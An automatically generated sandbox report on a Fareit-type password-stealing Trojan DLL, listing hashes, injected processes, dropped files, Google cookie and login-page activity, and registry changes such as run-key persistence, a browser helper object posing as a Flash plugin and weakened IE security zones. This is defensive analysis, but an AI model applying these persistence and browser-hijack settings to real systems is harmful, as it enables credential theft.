Trojan.Win32.Agent.idyd (Kaspersky), Gen:Variant.Graftor.153398 (AdAware), Trojan-PSW.Win32.Fareit.FD, mzpefinder_pcap_file.YR, TrojanPSWFareit.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 12cff1b8d88a499ae26d0a6618c799ed
SHA1: c97a334459acbb593ac662fe44aadc5efd2e5c2f
SHA256: 39d243f5099851f228478d69aa0758760771b6220f925d219eda68748de99d4f
SSDeep: 3072:jHrScoJ9SObJIfOB0tpmJvtk6jhWrLLByesw L99vDq0 y8Gemsfq/eBJNF7i8D6:bLSJV7SoXDm0 VGAyWv
Size: 289792 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472
The Trojan injects its code into the following process(es):
wilk.exe:1700
p.exe:1536
msv.exe:1820
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process wilk.exe:1700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)
The process p.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp (0 bytes)
The process msv.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (0 bytes)
The process regsvr32.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)
The process ie.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (16 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (0 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (0 bytes)
Registry activity
The process wilk.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"IE.exe" = "Utilitário de Instalação do Windows Internet Explorer 9"
[HKCU\Software\VB and VBA Program Settings\ml\inst]
"inect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}" = "1"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 B7 DE EC 83 C8 17 D4 56 64 29 EB FA 20 79 C3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"0" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"
The process RegSvr32.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 35 2C 29 3A 38 C2 B2 AC 7E 90 CA 94 90 C5 A9"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"
[HKCR\Plugin.FlashPlayer\Clsid]
"(Default)" = "{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}]
"(Default)" = "_FlashPlayer"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0]
"(Default)" = "Plugin"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\VERSION]
"(Default)" = "1.0"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\ProgID]
"(Default)" = "Plugin.FlashPlayer"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\HELPDIR]
"(Default)" = "%WinDir%"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\0\win32]
"(Default)" = "%WinDir%\gbclass.dll"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Plugin.FlashPlayer]
"(Default)" = "Plugin.FlashPlayer"
The process p.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 3C FB B6 FF 15 BC 5D 07 C4 95 CE FD 36 A0 44"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\WinRAR]
"HWID" = "7B 38 44 41 46 37 39 38 37 2D 38 44 37 43 2D 34"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The process p.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 50 33 89 74 6F 6B 82 90 3D 48 12 57 B0 9D AA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process mscorsvw.exe:172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
The process msv.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 06 ED B6 6C 71 90 4E B4 E2 E4 23 34 E7 4B E1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 24 6B 6C A0 25 8B 67 76 2B 63 0F 41 7B 8F 9E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
